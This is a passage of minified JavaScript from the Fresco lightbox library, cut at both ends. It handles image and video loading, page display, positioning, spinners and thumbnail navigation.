t=[],i=Math.max(1,this._position-e[0]),n=Math.min(this._position+e[1],this._total),o=this._position,s=o;s<=n;s++){(a=Pages.pages[s-1])._position!=o&&t.push(a)}for(s=o;i<=s;s--){var a;(a=Pages.pages[s-1])._position!=o&&t.push(a)}return t},preloadSurroundingImages:function(){var e=this._getSurroundingPages();$.each(e,$.proxy(function(e,t){t.preload()},this))},preload:function(){this.preloading||this.preloaded||"image"!=this.view.type||!this.view.options.preload||this.loaded||(this.create(),this.preloading=!0,this.preloadReady=new ImageReady(this.image[0],$.proxy(function(e){this.loaded=!0,i[this.view.url]=!0,this.preloading=!1,this.preloaded=!0,this.dimensions={width:e.img.naturalWidth,height:e.img.naturalHeight}},this),null,{method:"naturalWidth"}))},load:function(t,e){if(this.create(),this.loaded)t&&t();else switch(this.abort(),this.loading=!0,this.view.options.spinner&&(this._spinnerDelay=setTimeout($.proxy(function(){Spinner.show()},this),this.view.options.spinnerDelay||0)),this.view.type){case"image":if(this.error)return void(t&&t());this.imageReady=new ImageReady(this.image[0],$.proxy(function(e){this._markAsLoaded(),this.setDimensions({width:e.img.naturalWidth,height:e.img.naturalHeight}),t&&t()},this),$.proxy(function(){this._markAsLoaded(),this.image.hide(),this.content.prepend(this.error=$("<div>").addClass("fr-error fr-content-element").append($("<div>").addClass("fr-error-icon"))),this.element.addClass("fr-has-error"),this.setDimensions({width:this.error.outerWidth(),height:this.error.outerHeight()}),this.error.css({width:"100%",height:"100%"}),t&&t()},this),{method:this.view.options.loadedMethod});break;case"vimeo":this.vimeoReady=new VimeoReady(this.view.url,$.proxy(function(e){this._markAsLoaded(),this.setDimensions({width:e.dimensions.width,height:e.dimensions.height}),t&&t()},this));break;case"youtube":this._markAsLoaded(),this.setDimensions({width:this.view.options.width,height:this.view.options.height}),t&&t()}},setDimensions:function(e){if(this.dimensions=e,this.view.options.maxWidth||this.view.options.maxHeight){var t=this.view.options,i={width:t.maxWidth?t.maxWidth:this.dimensions.width,height:t.maxHeight?t.maxHeight:this.dimensions.height};this.dimensions=Fit.within(i,this.dimensions)}},_markAsLoaded:function(){this._abortSpinnerDelay(),this.loading=!1,this.loaded=!0,i[this.view.url]=!0,Spinner.hide(null,null,this._position)},isVideo:function(){return Type.isVideo(this.view.type)},insertVideo:function(e){if(!this.playerIframe&&this.isVideo()){var t="http"+(window.location&&"https:"==window.location.protocol?"s":"")+":",i=$.extend({},this.view.options[this.view.type]||{}),n=$.param(i),o={vimeo:t+"//player.vimeo.com/video/{id}?{queryString}",youtube:t+"//www.youtube.com/embed/{id}?{queryString}"}[this.view.type].replace("{id}",this.view._data.id).replace("{queryString}",n);this.content.prepend(this.playerIframe=$("<iframe webkitAllowFullScreen mozallowfullscreen allowFullScreen>").addClass("fr-content-element").attr({src:o,height:this._contentDimensions.height,width:this._contentDimensions.width,frameborder:0})),e&&e()}else e&&e()},raise:function(){var e=Pages.element[0].lastChild;e&&e==this.element[0]||Pages.element.append(this.element)},show:function(t){var e=this.queues.showhide;e.queue([]),e.queue($.proxy(function(e){var t=this.view.options.spinner&&!i[this.view.url];Spinner._visible&&!t&&Spinner.hide(),Pages.stopInactive(),e()},this)),e.queue($.proxy(function(e){this.updateUI(),UI.set(this._ui),e()},this)),e.queue($.proxy(function(e){Keyboard.enable(this.view.options.keyboard),e()},this)),e.queue($.proxy(function(e){Spinner.setSkin(this.view.options.skin),this.load($.proxy(function(){this.preloadSurroundingImages(),e()},this))},this)),e.queue($.proxy(function(e){this.raise(),Window.setSkin(this.view.options.skin),UI.enable(),this.fitToBox(),Window.adjustToScroll(),e()},this)),this.isVideo()&&e.queue($.proxy(function(e){this.insertVideo($.proxy(function(){e()}))},this)),this.view.options.sync||e.queue($.proxy(function(e){Pages.hideInactive(e)},this)),e.queue($.proxy(function(e){var t=3,i=this.view.options.effects.content.show;Window.setShowingType(this.view.type),Window.visible||(i=this.view.options.effects.window.show,"function"==$.type(this.view.options.onShow)&&this.view.options.onShow.call(Fresco)),this.view.options.sync&&(t++,Pages.hideInactive(function(){--t<1&&e()})),Window.show(function(){--t<1&&e()},this.view.options.effects.window.show),this._show(function(){--t<1&&e()},i),UI.adjustPrevNext(function(){--t<1&&e()},Window._first?0:i),Window._first?(UI.show(null,0),Window._first=!1):UI.show(null,0);var n=this.view.options.afterPosition;"function"==$.type(n)&&n.call(Fresco,this._position)},this)),e.queue($.proxy(function(e){this._visible=!0,t&&t(),e()},this))},_show:function(e,t){var i=Window.visible?"number"==$.type(t)?t:this.view.options.effects.content.show:0;this.element.stop(!0).show().fadeTo(i||0,1,e)},hide:function(e,t){if(this.element){this.removeVideo(),this.abort();var i="number"==$.type(t)?t:this.view.options.effects.content.hide;this.isVideo()&&(i=0),this.element.stop(!0).fadeTo(i,0,"frescoEaseInCubic",$.proxy(function(){this.element.hide(),this._visible=!1,Pages.removeTracking(this._position),e&&e()},this))}else e&&e()},stop:function(){this.queues.showhide.queue([]),this.element&&this.element.stop(!0),this.abort()},removeVideo:function(){this.playerIframe&&(this.playerIframe[0].src="//about:blank",this.playerIframe.remove(),this.playerIframe=null)},remove:function(){this.stop(),this.removeVideo(),this.element&&this.element.remove(),this._track&&(Pages.removeTracking(this._position),this._track=!1),this.preloadReady&&(this.preloadReady.abort(),this.preloadReady=null,this.preloading=null,this.preloaded=null),this._visible=!1,this.removed=!0},abort:function(){this.imageReady&&(this.imageReady.abort(),this.imageReady=null),this.vimeoReady&&(this.vimeoReady.abort(),this.vimeoReady=null),this._abortSpinnerDelay(),this.loading=!1},_abortSpinnerDelay:function(){this._spinnerDelay&&(clearTimeout(this._spinnerDelay),this._spinnerDelay=null)},_getInfoHeight:function(e){var t=this.view.options.position&&1<this._total;switch(this._ui){case"fullclick":case"inside":if(!this.view.caption&&!t)return 0;break;case"outside":if(!this.view.caption)return 0}var i="inside"==this._ui?this.infoInside:this.info;"outside"==this._ui&&(e=Math.min(e,Window._boxDimensions.width));var n,o=i[0].style.width;return("inside"==this._ui||"fullclick"==this._ui)&&(o="100%"),i.css({width:e+"px"}),n=parseFloat(i.outerHeight()),i.css({width:o}),n},_whileVisible:function(e,t){var i=[],n=Window.element.add(this.element);t&&(n=n.add(t)),$.each(n,function(e,t){$(t).is(":visible")||i.push($(t).show())});var o=this.element.hasClass("fr-no-caption");this.element.removeClass("fr-no-caption");var s=this.element.hasClass("fr-has-caption");this.element.addClass("fr-has-caption"),Window.element.css({visibility:"hidden"}),e(),Window.element.css({visibility:"visible"}),o&&this.element.addClass("fr-no-caption"),s||this.element.removeClass("fr-has-caption"),$.each(i,function(e,t){t.hide()})},updateForced:function(){this.create(),this._fullClick=this.view.options.fullClick,this._noOverflow=!1,0<parseInt(this.element.css("min-width"))&&(this._fullClick=!0),0<parseInt(this.element.css("min-height"))&&(this._noOverflow=!0)},updateUI:function(e){this.updateForced();e=this._fullClick?"fullclick":this.view.options.ui;this._ui&&this.element.removeClass("fr-ui-"+this._ui),this.element.addClass("fr-ui-"+e),this._ui=e},fitToBox:function(){if(this.content){var i=(this.element,$.extend({},Window.getBoxDimensions())),e=$.extend({},this.dimensions),t=this.container;this.updateUI();var n={left:parseInt(t.css("padding-left")),top:parseInt(t.css("padding-top"))};if("outside"==this._ui&&this._positionOutside){var o=0;this._whileVisible($.proxy(function(){this._positionOutside.is(":visible")&&(o=this._positionOutside.outerWidth(!0))},this)),o>n.left&&(n.left=o)}i.width-=2*n.left,i.height-=2*n.top;var s,a={width:!0,height:!!this._noOverflow||!this.view.options.overflow.y},r=Fit.within(i,e,a),l=$.extend({},r),c=(this.content,0),u="inside"==this._ui,d=u?this.infoInside:this.info,h=u?this.captionInside:this.caption,p=u?this.posInside:this.pos,f=!!h;switch(this._ui){case"outside":var m=$.extend({},l);this.caption&&(g=this.caption,this._whileVisible($.proxy(function(){for(var e=0;e<2;){c=this._getInfoHeight(l.width);var t=i.height-l.height;t<c&&(l=Fit.within({width:l.width,height:Math.max(l.height-(c-t),0)},l,a)),e++}c=this._getInfoHeight(l.width);(!this.view.options.overflow.y&&c+l.height>i.height||d&&"none"==d.css("display")||c>=.5*l.height)&&(f=!1,c=0,l=m)},this),g)),d&&d.css({width:l.width+"px"}),s={width:l.width,height:l.height+c};break;case"inside":if(this.caption){var g=h;this._whileVisible($.proxy(function(){(c=this._getInfoHeight(l.width))>=.45*l.height&&(f=!1,c=0)},this),g)}s=l;break;case"fullclick":var v=[];h&&v.push(h),this._whileVisible($.proxy(function(){if((h||p)&&d.css({width:"100%"}),c=this._getInfoHeight(Window._boxDimensions.width),h&&c>.5*i.height)if(f=!1,p){var e=this.caption.is(":visible");this.caption.hide(),c=this._getInfoHeight(Window._boxDimensions.width),e&&this.caption.show()}else c=0;l=Fit.within({width:i.width,height:Math.max(0,i.height-c)},l,a),s=l},this),v),this.content.css({"padding-bottom":0})}h&&h[f?"show":"hide"](),this.element[(f?"remove":"add")+"Class"]("fr-no-caption"),this.element[(f?"add":"remove")+"Class"]("fr-has-caption"),this.content.css(l),this.background.css(s),this.playerIframe&&this.playerIframe.attr(l),this.overlap={y:s.height+("fullclick"==this._ui?c:0)-Window._boxDimensions.height,x:0},this._track=!this._noOverflow&&this.view.options.overflow.y&&0<this.overlap.y,this._infoHeight=c,this._padding=n,this._contentDimensions=l,this._backgroundDimensions=s,Pages[(this._track?"set":"remove")+"Tracking"](this._position),this.position()}},position:function(){if(this.content){var e=this._contentDimensions,t=this._backgroundDimensions,i={top:.5*Window._boxDimensions.height-.5*t.height,left:.5*Window._boxDimensions.width-.5*t.width},n={top:i.top+e.height,left:i.left},o=0,s="inside"==this._ui?this.infoInside:this.info;switch(this._ui){case"fullclick":i.top=.5*(Window._boxDimensions.height-this._infoHeight)-.5*t.height,n={top:Window._boxDimensions.height-this._infoHeight,left:0,bottom:"auto"},o=this._infoHeight;break;case"inside":n={top:"auto",left:0,bottom:0}}if(0<this.overlap.y){var a=Pages.getXYP();switch(i.top=0-a.y*this.overlap.y,this._ui){case"outside":case"fullclick":n.top=Window._boxDimensions.height-this._infoHeight;break;case"inside":var r=i.top+e.height-Window._boxDimensions.height,l=-1*i.top;if(n.bottom=r,this.closeInside.css({top:l}),1<this._total){var c=Window.element.is(":visible");c||Window.element.show();var u=this.previousInside.attr("style");this.previousInside.removeAttr("style");var d=parseInt(this.previousInside.css("margin-top"));this.previousInside.attr({style:u}),c||Window.element.hide();var h=this.previousInside.add(this.nextInside),p=.5*this.overlap.y;h.css({"margin-top":d+(l-p)}),this.positionInside&&this.positionInside.css({bottom:r})}}}else"inside"==this._ui&&this.element.find(".fr-info, .fr-side, .fr-close, .fr-position-inside").removeAttr("style");s&&s.css(n),this.container.css({bottom:o}),this.content.css(i),this.background.css(i)}}}),e}(),Pages={initialize:function(e){this.element=e,this.pages=[],this.uid=1,this._tracking=[]},load:function(e){this.views=e,this.removeAll(),$.each(e,$.proxy(function(e,t){this.pages.push(new Page(t,e+1,this.views.length))},this))},show:function(e,t){var i=this.pages[e-1];this.page&&this.page.uid==i.uid||(this.page=i,Thumbnails.show(e),Window.updateBoxDimensions(),i.show($.proxy(function(){t&&t()},this)))},getPositionInActivePageGroup:function(i){var n=0;return $.each(this.pages,function(e,t){t.view.element&&t.view.element==i&&(n=e+1)}),n},getLoadingCount:function(){var i=0;return $.each(this.pages,function(e,t){t.loading&&i++}),i},removeAll:function(){$.each(this.pages,function(e,t){t.remove()}),this.pages=[]},hideInactive:function(i,n){var o=[];$.each(this.pages,$.proxy(function(e,t){t.uid!=this.page.uid&&o.push(t)},this));var s=0+o.length;return s<1?i&&i():$.each(o,function(e,t){t.hide(function(){i&&--s<1&&i()},n)}),o.length},stopInactive:function(){$.each(this.pages,$.proxy(function(e,t){t.uid!=this.page.uid&&t.stop()},this))},stop:function(){$.each(this.pages,function(e,t){t.stop()})},handleTracking:function(e){Browser.IE&&Browser.IE<9?(this.setXY({x:e.pageX,y:e.pageY}),this.updatePositions()):this._tracking_timer=setTimeout($.proxy(function(){this.setXY({x:e.pageX,y:e.pageY}),this.updatePositions()},this),30)},clearTrackingTimer:function(){this._tracking_timer&&(clearTimeout(this._tracking_timer),this._tracking_timer=null)},startTracking:function(){Support.mobileTouch||this._handleTracking||$(document.documentElement).on("mousemove",this._handleTracking=$.proxy(this.handleTracking,this))},stopTracking:function(){!Support.mobileTouch&&this._handleTracking&&($(document.documentElement).off("mousemove",this._handleTracking),this._handleTracking=null,this.clearTrackingTimer())},setTracking:function(e){this.isTracking(e)||(this._tracking.push(this.pages[e-1]),1==this._tracking.length&&this.startTracking())},clearTracking:function(){this._tracking=[]},removeTracking:function(t){this._tracking=$.grep(this._tracking,function(e){return e._position!=t}),this._tracking.length<1&&this.stopTracking()},isTracking:function(i){var n=!1;return $.each(this._tracking,function(e,t){return t._position==i?!(n=!0):void 0}),n},setXY:function(e){this._xy=e},getXYP:function(e){var t=Pages.page,i=$.extend({},Window._boxDimensions);(e=$.extend({},this._xy)).y-=$(window).scrollTop(),t&&("outside"==t._ui||"fullclick"==t._ui)&&0<t._infoHeight&&(i.height-=t._infoHeight),e.y-=Window._boxPosition.top;var n={x:0,y:Math.min(Math.max(e.y/i.height,0),1)},o={x:"width",y:"height"},s={};return $.each("y".split(" "),$.proxy(function(e,t){s[t]=Math.min(Math.max(20/i[o[t]],0),1),n[t]*=1+2*s[t],n[t]-=s[t],n[t]=Math.min(Math.max(n[t],0),1)},this)),this.setXYP(n),this._xyp},setXYP:function(e){this._xyp=e},updatePositions:function(){this._tracking.length<1||$.each(this._tracking,function(e,t){t.position()})}};$.extend(View.prototype,{initialize:function(object){var options=arguments[1]||{},data={};if("string"==$.type(object))object={url:object};else if(object&&1==object.nodeType){var element=$(object);object={element:element[0],url:element.attr("href"),caption:element.data("fresco-caption"),group:element.data("fresco-group"),extension:element.data("fresco-extension"),type:element.data("fresco-type"),options:element.data("fresco-options")&&eval("({"+element.data("fresco-options")+"})")||{}}}if(object&&(object.extension||(object.extension=detectExtension(object.url)),!object.type)){var data=getURIData(object.url);object._data=data,object.type=data.type}return object._data||(object._data=getURIData(object.url)),object&&object.options?object.options=$.extend(!0,$.extend({},options),$.extend({},object.options)):object.options=$.extend({},options),object.options=Options.create(object.options,object.type,object._data),$.extend(this,object),this}});var Spinner={supported:Support.css.transform&&Support.css.animation,initialize:function(e){this.element=$("<div>").addClass("fr-spinner").hide();for(var t=1;t<=12;t++)this.element.append($("<div>").addClass("fr-spin-"+t));this.element.on("click",$.proxy(function(){Window.hide()},this)),this.element.on("fresco:mousewheel",function(e){e.preventDefault()})},setSkin:function(e){this.supported&&(this._skin&&this.element.removeClass("fr-spinner-skin-"+this._skin),this.updateDimensions(),this.element.addClass("fr-spinner-skin-"+e),this._skin=e)},updateDimensions:function(){var e=this._attached;e||this.attach(),this._dimensions={width:this.element.outerWidth(),height:this.element.outerHeight()},e||this.detach()},attach:function(){this._attached||($(document.body).append(this.element),this._attached=!0)},detach:function(){this._attached&&(this.element.detach(),this._attached=!1)},show:function(e,t){this._visible=!0,this.attach(),this.center();var i=Pages.page&&Pages.page.view.options.effects.spinner.show||0,n=("number"==$.type(t)?t:i)||0;this.element.stop(!0).fadeTo(n,1,e)},hide:function(e,t,i){this._visible=!1;var n=Pages.page&&Pages.page.view.options.effects.spinner.hide||0,o=("number"==$.type(t)?t:n)||0;this.element.stop(!0).fadeOut(o||0,$.proxy(function(){this.detach(),e&&e()},this))},center:function(){if(this.supported){this._dimensions||this.updateDimensions();var e=Pages.page,t=0;e&&"fullclick"==e._ui&&e._whileVisible(function(){t=e._getInfoHeight(Window._boxDimensions.width)}),this.element.css({top:Window._boxPosition.top+.5*Window._boxDimensions.height-.5*this._dimensions.height-.5*t,left:Window._boxPosition.left+.5*Window._boxDimensions.width-.5*this._dimensions.width})}}},_Fresco={_disabled:!1,_fallback:!0,initialize:function(){Window.initialize(),this._disabled||this.startDelegating()},startDelegating:function(){this._delegateHandler||$(document.documentElement).on("click",".fresco[href]",this._delegateHandler=$.proxy(this.delegate,this)).on("click",this._setClickXYHandler=$.proxy(this.setClickXY,this))},stopDelegating:function(){this._delegateHandler&&($(document.documentElement).off("click",".fresco[href]",this._delegateHandler).off("click",this._setClickXYHandler),this._setClickXYHandler=null,this._delegateHandler=null)},setClickXY:function(e){Pages.setXY({x:e.pageX,y:e.pageY})},delegate:function(e){if(!this._disabled){e.stopPropagation(),e.preventDefault();var t=e.currentTarget;this.setClickXY(e),_Fresco.show(t)}},show:function(object){if(this._disabled)this.showFallback.apply(_Fresco,_slice.call(arguments));else{var options=arguments[1]||{},position=arguments[2];arguments[1]&&"number"==$.type(arguments[1])&&(position=arguments[1],options={});var views=[],object_type,isElement=_.isElement(object);switch(object_type=$.type(object)){case"string":case"object":var view=new View(object,options),_dgo="data-fresco-group-options";if(view.group){if(isElement){var elements=$('.fresco[data-fresco-group="'+$(object).data("fresco-group")+'"]'),groupOptions={};elements.filter("["+_dgo+"]").each(function(i,element){$.extend(groupOptions,eval("({"+($(element).attr(_dgo)||"")+"})"))}),elements.each(function(e,t){position||t!=object||(position=e+1),views.push(new View(t,$.extend({},groupOptions,options)))})}}else{var groupOptions={};isElement&&$(object).is("["+_dgo+"]")&&($.extend(groupOptions,eval("({"+($(object).attr(_dgo)||"")+"})")),view=new View(object,$.extend({},groupOptions,options))),views.push(view)}break;case"array":$.each(object,function(e,t){var i=new View(t,options);views.push(i)})}var groupExtend={grouped:{caption:!1}},firstUI=views[0].options.ui,positionInAPG;$.each(views,function(e,t){t.caption&&(groupExtend.grouped.caption=!0),0<e&&t.options.ui!=firstUI&&(t.options.ui=firstUI)}),$.each(views,function(e,t){t=$.extend(t,groupExtend)}),(!position||position<1)&&(position=1),position>views.length&&(position=views.length),isElement&&(positionInAPG=Pages.getPositionInActivePageGroup(object))?Window.setPosition(positionInAPG):Window.load(views,position)}},showFallback:function(e){if(this._fallback){var t=function e(t){var i=$.type(t);if("string"==i)n=t;else if("array"==i&&t[0])n=e(t[0]);else if(_.isElement(t)&&$(t).attr("href"))var n=$(t).attr("href");else n=!!t.url&&t.url;return n}(e);t&&(window.location.href=t)}}};$.extend(Fresco,{show:function(e){return _Fresco.show.apply(_Fresco,_slice.call(arguments)),this},hide:function(){return Window.hide(),this},disable:function(){return _Fresco.stopDelegating(),_Fresco._disabled=!0,this},enable:function(){return _Fresco._disabled=!1,_Fresco.startDelegating(),this},fallback:function(e){return _Fresco._fallback=e,this},setDefaultSkin:function(e){return Options.defaults.skin=e,this}}),(Browser.IE&&Browser.IE<7||"number"==$.type(Browser.Android)&&Browser.Android<3||Browser.MobileSafari&&"number"==$.type(Browser.WebKit)&&Browser.WebKit<533.18)&&(_Fresco.show=_Fresco.showFallback);var Thumbnails={initialize:function(e){this.element=e,this._thumbnails=[],this._orientation="vertical",this._vars={thumbnail:{},thumbnailFrame:{},thumbnails:{}},this.build(),this.startObserving()},build:function(){this.element.append(this.wrapper=$("<div>").addClass("fr-thumbnails-wrapper").append(this._slider=$("<div>").addClass("fr-thumbnails-slider").append(this._previous=$("<div>").addClass("fr-thumbnails-side fr-thumbnails-side-previous").append(this._previous_button=$("<div>").addClass("fr-thumbnails-side-button").append($("<div>").addClass("fr-thumbnails-side-button-background")).append($("<div>").addClass("fr-thumbnails-side-button-icon")))).append(this._thumbs=$("<div>").addClass("fr-thumbnails-thumbs").append(this._slide=$("<div>").addClass("fr-thumbnails-slide"))).append(this._next=$("<div>").addClass("fr-thumbnails-side fr-thumbnails-side-next").append(this._next_button=$("<div>").addClass("fr-thumbnails-side-button").append($("<div>").addClass("fr-thumbnails-side-button-background")).append($("<div>").addClass("fr-thumbnails-side-button-icon"))))))},startObserving:function(){this._slider.delegate(".fr-thumbnail","click",$.proxy(function(e){e.stopPropagation();var t=$(e.target).closest(".fr-thumbnail")[0],i=t&&$(t).data("fr-position");i&&(this.setActive(i),Window.setPosition(i))},this)),this._slider.bind("click",function(e){e.stopPropagation()}),this._previous.bind("click",$.proxy(this.previousPage,this)),this._next.bind("click",$.proxy(this.nextPage,this))},load:function(e){this.clear();var i="horizontal",n=!1;$.each(e,$.proxy(function(e,t){"vertical"==t.options.thumbnails&&(i="vertical"),t.options.thumbnails||(n=!0)},this)),this.setOrientation(i),this._disabledGroup=n,$.each(e,$.proxy(function(e,t){this._thumbnails.push(new Thumbnail(t,e+1))},this)),this.fitToViewport()},clear:function(){$.each(this._thumbnails,function(e,t){t.remove()}),this._thumbnails=[],this._position=-1,this._page=-1},setOrientation:function(e){this._orientation&&Window.element.removeClass("fr-thumbnails-"+this._orientation),Window.element.addClass("fr-thumbnails-"+e),this._orientation=e},disable:function(){Window.element.removeClass("fr-thumbnails-enabled").addClass("fr-thumbnails-disabled"),this._disabled=!0},enable:function(){Window.element.removeClass("fr-thumbnails-disabled").addClass("fr-thumbnails-enabled"),this._disabled=!1},enabled:function(){return!this._disabled},disabled:function(){return this._disabled},updateVars:function(){var e=Window.element,t=this._vars,i="horizontal"==this._orientation,n=i?"top":"left",o=i?"left":"top",s=i?"bottom":"left",a=i?"top":"right",r=i?"width":"height",l=i?"height":"width",c={left:"right",right:"left",top:"bottom",bottom:"top"};this.element.removeClass("fr-thumbnails-measured");var u=e.is(":visible");if(u||e.show(),this.disabled()&&this.enable(),!this.element.is(":visible")||this._thumbnails.length<2||this._disabledGroup)return this.disable(),$.extend(this._vars.thumbnails,{width:0,height:0}),u||e.hide(),void this.element.addClass("fr-thumbnails-measured");this.enable();var d=this._previous,h=this._next,p=this._thumbs,f=Bounds.viewport(),m=this.element["inner"+_.String.capitalize(l)](),g=parseInt(this._thumbs.css("padding-"+n))||0,v=Math.max(m-2*g,0),y=parseInt(this._thumbs.css("padding-"+o))||0,w=(parseInt(this.element.css("margin-"+s))||0)+(parseInt(this.element.css("margin-"+a))||0);$.extend(t.thumbnails,{height:m+w,width:f[i?"width":"height"],paddingTop:g}),$.extend(t.thumbnail,{height:v,width:v}),$.extend(t.thumbnailFrame,{width:v+2*y,height:m}),t.sides={previous:{width:h["inner"+_.String.capitalize(r)](),marginLeft:parseInt(d.css("margin-"+o))||0,marginRight:parseInt(d.css("margin-"+c[o]))||0},next:{width:h["inner"+_.String.capitalize(r)](),marginLeft:parseInt(h.css("margin-"+o))||0,marginRight:parseInt(h.css("margin-"+c[o]))||0}};var b=f[r],x=t.thumbnailFrame.width;p=this._thumbnails.length;t.thumbnails.width=b,t.sides.enabled=1<p*x/b;var C=b,k=t.sides,T=k.previous,S=k.next,z=T.marginLeft+T.width+T.marginRight+S.marginLeft+S.width+S.marginRight;t.sides.enabled&&(C-=z);var E=p*x;E<(C=Math.floor(C/x)*x)&&(C=E);var O=C+(t.sides.enabled?z:0);t.ipp=C/x,this._mode="page",t.ipp<=1&&(O=C=b,t.sides.enabled=!1,this._mode="center"),t.pages=Math.ceil(p*x/C),t.wrapper={width:O+1,height:m},t.thumbs={width:C,height:m},t.slide={width:p*x+1,height:m},u||e.hide(),this.element.addClass("fr-thumbnails-measured")},hide:function(){this.disable(),this.thumbnails.hide(),this._visible=!1},getDimensions:function(){var e="horizontal"==this._orientation;return{width:e?this._vars.thumbnails.width:this._vars.thumbnails.height,height:e?this._vars.thumbnails.height:this._vars.thumbnails.width}},fitToViewport:function(){if(this.updateVars(),!this.disabled()){var e=$.extend({},this._vars),t="horizontal"==this._orientation;$.each(this._thumbnails,function(e,t){t.resize()}),this._previous[e.sides.enabled?"show":"hide"](),this._next[e.sides.enabled?"show":"hide"](),this._thumbs.css({width:e.thumbs[t?"width":"height"],height:e.thumbs[t?"height":"width"]}),this._slide.css({width:e.slide[t?"width":"height"],height:e.slide[t?"height":"width"]});var i={width:e.wrapper[t?"width":"height"],height:e.wrapper[t?"height":"width"]};i["margin-"+(t?"left":"top")]=Math.round(-.5*e.wrapper.width)+"px",i["margin-"+(t?"top":"left")]=0,this.wrapper.css(i),this._position&&this.moveTo(this._position,!0)}},moveToPage:function(e){if(!(e<1||e>this._vars.pages||e==this._page)){var t=this._vars.ipp*(e-1)+1;this.moveTo(t)}},previousPage:function(){this.moveToPage(this._page-1)},nextPage:function(){this.moveToPage(this._page+1)},show:function(e){var t=this._position<0;e<1&&(e=1);var i=this._thumbnails.length;i<e&&(e=i),this._position=e,this.setActive(e),("page"!=this._mode||this._page!=Math.ceil(e/this._vars.ipp))&&this.moveTo(e,t)},moveTo:function(e,t){if(this.updateVars(),!this.disabled()){var i,n="horizontal"==this._orientation,o=.5*Bounds.viewport()[n?"width":"height"],s=this._vars.thumbnailFrame.width;if("page"==this._mode){var a=Math.ceil(e/this._vars.ipp);this._page=a,i=s*(this._page-1)*this._vars.ipp*-1;var r="fr-thumbnails-side-button-disabled";this._previous_button[(a<2?"add":"remove")+"Class"](r),this._next_button[(a>=this._vars.pages?"add":"remove")+"Class"](r)}else i=o+-1*(s*(e-1)+.5*s);a=Pages.page;var l={},c={};l[n?"top":"left"]=0,c[n?"left":"top"]=i+"px",this._slide.stop(!0).css(l).animate(c,t?0:a&&a.view.options.effects.thumbnails.slide||0,$.proxy(function(){this.loadCurrentPage()},this))}},loadCurrentPage:function(){var e,t;if(this._position&&this._vars.thumbnailFrame.width&&!(this._thumbnails.length<1)){if("page"==this._mode){if(this._page<1)return;e=(this._page-1)*this._vars.ipp+1,t=Math.min(e-1+this._vars.ipp,this._thumbnails.length)}else{var i=(this._orientation,Math.ceil(this._vars.thumbnails.width/this._vars.thumbnailFrame.width));e=Math.max(Math.floor(Math.max(this._position-.5*i,0)),1),t=Math.ceil(Math.min(this._position+.5*i)),this._thumbnails.length<t&&(t=this._thumbnails.length)}for(var n=e;n<=t;n++)this._thumbnails[n-1].load()}},setActive:function(e){this._slide.find(".fr-thumbnail-active").removeClass("fr-thumbnail-active");var t=e&&this._thumbnails[e-1];t&&t.activate()},refresh:function(){this._position&&this.setPosition(this._position)}};$.extend(Thumbnail.prototype,{initialize:function(e,t){this.view=e,this._dimension={},this._position=t,this.preBuild()},preBuild:function(){this.thumbnail=$("<div>").addClass("fr-thumbnail").data("fr-position",this._position)},build:function(){if(!this.thumbnailFrame){var e=this.view.options;Thumbnails._slide.append(this.thumbnailFrame=$("<div>").addClass("fr-thumbnail-frame").append(this.thumbnail.append(this.thumbnailWrapper=$("<div>").addClass("fr-thumbnail-wrapper")))),"image"==this.view.type&&this.thumbnail.addClass("fr-load-thumbnail").data("thumbnail",{view:this.view,src:e.thumbnail||this.view.url});var t=e.thumbnail&&e.thumbnail.icon;t&&this.thumbnail.append($("<div>").addClass("fr-thumbnail-icon fr-thumbnail-icon-"+t)),this.thumbnail.append($("<div>").addClass("fr-thumbnail-overlay").append($("<div>").addClass("fr-thumbnail-overlay-background")).append(this.loading=$("<div>").addClass("fr-thumbnail-loading").append($("<div>").addClass("fr-thumbnail-loading-background")).append(this.spinner=$("<div>").addClass("fr-thumbnail-spinner").hide().append($("<div>").addClass("fr-thumbnail-spinner-spin")))).append($("<div>").addClass("fr-thumbnail-overlay-border"))),this.thumbnail.append($("<div>").addClass("fr-thumbnail-state")),this.resize()}},remove:function(){this.thumbnailFrame&&(this.thumbnailFrame.remove(),this.thumbnailFrame=null,this.image=null),this.ready&&(this.ready.abort(),this.ready=null),this.vimeoThumbnail&&(this.vimeoThumbnail.abort(),this.vimeoThumbnail=null),this._loading=!1,this._removed=!0,this.view=null,this._clearDelay()},load:function(){if(!(this._loaded||this._loading||this._removed)){this.thumbnailWrapper||this.build(),this._loading=!0;var e=this.view.options.thumbnail,t=e&&"boolean"==$.type(e)?this.view.url:e||this.view.url;if(this._url=t)if("vimeo"==this.view.type)if(t==e)this._url=t,this._load(this._url);else switch(this.view.type){case"vimeo":this.vimeoThumbnail=new VimeoThumbnail(this.view.url,$.proxy(function(e){this._url=e,this._load(e)},this),$.proxy(function(){this._error()},this))}else this._load(this._url)}},activate:function(){this.thumbnail.addClass("fr-thumbnail-active")},_load:function(e){this.thumbnailWrapper.prepend(this.image=$("<img>").addClass("fr-thumbnail-image").attr({src:e}).css({opacity:1e-4})),this.fadeInSpinner(),this.ready=new ImageReady(this.image[0],$.proxy(function(e){var t=e.img;this.thumbnailFrame&&this._loading&&(this._loaded=!0,this._loading=!1,this._dimensions={width:t.naturalWidth,height:t.naturalHeight},this.resize(),this.show())},this),$.proxy(function(){this._error()},this),{method:this.view.options.loadedMethod})},_error:function(){this._loaded=!0,this._loading=!1,this.thumbnail.addClass("fr-thumbnail-error"),this.image&&this.image.hide(),this.thumbnailWrapper.append($("<div>").addClass("fr-thumbnail-image")),this.show()},fadeInSpinner:function(){if(Spinner.supported&&this.view.options.spinner){this._clearDelay();var e=this.view.options.effects.thumbnail;this._delay=setTimeout($.proxy(function(){this.spinner.stop(!0).fadeTo(e.show||0,1)},this),this.view.options.spinnerDelay||0)}},show:function(){this._clearDelay();var e=this.view.options.effects.thumbnail;this.loading.stop(!0).delay(e.delay).fadeTo(e.show,0)},_clearDelay:function(){this._delay&&(clearTimeout(this._delay),this._delay=null)},resize:function(){if(this.thumbnailFrame){var e="horizontal"==Thumbnails._orientation;if(this.thumbnailFrame.css({width:Thumbnails._vars.thumbnailFrame[e?"width":"height"],height:Thumbnails._vars.thumbnailFrame[e?"height":"width"]}),this.thumbnailFrame.css({top:e?0:Thumbnails._vars.thumbnailFrame.width*(this._position-1),left:e?Thumbnails._vars.thumbnailFrame.width*(this._position-1):0}),this.thumbnailWrapper){var t=Thumbnails._vars.thumbnail;if(this.thumbnail.css({width:t.width,height:t.height,"margin-top":Math.round(-.5*t.height),"margin-left":Math.round(-.5*t.width),"margin-bottom":0,"margin-right":0}),this._dimensions){var i,n={width:t.width,height:t.height},o=Math.max(n.width,n.height),s=$.extend({},this._dimensions);if(s.width>n.width&&s.height>n.height){var 